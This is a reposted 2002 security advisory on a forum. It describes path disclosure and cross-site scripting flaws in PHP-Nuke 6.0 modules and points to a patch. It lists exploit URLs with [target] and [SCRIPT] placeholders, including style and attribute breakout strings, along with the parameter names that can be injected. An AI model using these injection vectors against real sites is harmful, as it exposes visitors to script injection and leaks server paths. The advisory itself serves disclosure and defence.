PDA

Bekijk Volledige Versie : PHP-Nuke 6.0 : Path Disclosure & Cross Site Scripting



Frog Man
16/12/02, 20:46
Informations :
°°°°°°°°°°°°°°
Product : PHP-Nuke
Version : 6.0
Website : http://www.phpnuke.org
Problems :
- Path Disclosure
- XSS


Developpement :
°°°°°°°°°°°°°°°
The majority of the PHPNuke's files are includes in modules.php or
index.php. To prevent the direct access, PHPNuke made two kinds of safety.
The first one (e.g. in modules/Downloads/index.php) is :
---------------------------------------------------
if (!eregi("modules.php", $PHP_SELF)) {
die ("You can't access this file directly...");
}
---------------------------------------------------

The second one (e.g. footer.php ) :
------------------------------------
if (eregi("footer.php",$PHP_SELF)) {
Header("Location: index.php");
die();
}
------------------------------------

Some files haven't these safety measures but they have security holes.

Exploits :
°°°°°°°°°°
Path Disclosure :
http://[target]/modules/Downloads/voteinclude.php
http://[target]/modules/Your_Account/navbar.php
http://[target]/modules/Forums/attachment.php
http://[target]/modules/Forums/auth.php
http://[target]/modules/News/comments.php
http://[target]/modules/Private_Messages/functions.php
http://[target]/modules/Private_Messages/index.php
http://[target]/modules/Private_Messages/read.php
http://[target]/modules/Private_Messages/reply.php
http://[target]/modules/Web_Links/voteinclude.php
http://[target]/modules/WebMail/contactbook.php?user=1

Path Disclosure & Cross Site Scripting :
- http://[target]/modules/Forums/bb_smilies.php?name=[SCRIPT]
or http://[target]/modules/Forums/bb_smilies.php?Default_Theme=[SCRIPT]
or
http://[target]/modules/Forums/bb_smilies.php?site_font=}--></style>[SCRIPT]
or http://[target]/modules/Forums/bb_smilies.php?bgcolor1=">[SCRIPT]
or with :
$sitename
$table_width
$color1
$forumver

- /modules/Forums/bbcode_ref.php with :
$name
$Default_Theme
$site_font
$sitename
$bgcolor2
$textcolor1
$bgcolor1
$forumver

- /modules/Forums/editpost.php, /modules/Forums/newtopic.php,
/modules/Forums/reply.php, /modules/Forums/topicadmin.php,
/modules/Forums/viewforum.php with :
$name

- /modules/Forums/searchbb.php with :
$name
$bgcolor3
$bgcolor1


Patch :
°°°°°°°
A patch can be found on http://www.phpsecure.org .


More details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/PHPNuke6.0.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FPHPNuke6.0.txt&langpair=fr%7Cen&hl=en&ie=ASCII&oe=ASCII

frog-m@n



__________________________________________________ _______________
MSN Messenger : discutez en direct avec vos amis !
http://www.msn.fr/msger/default.asp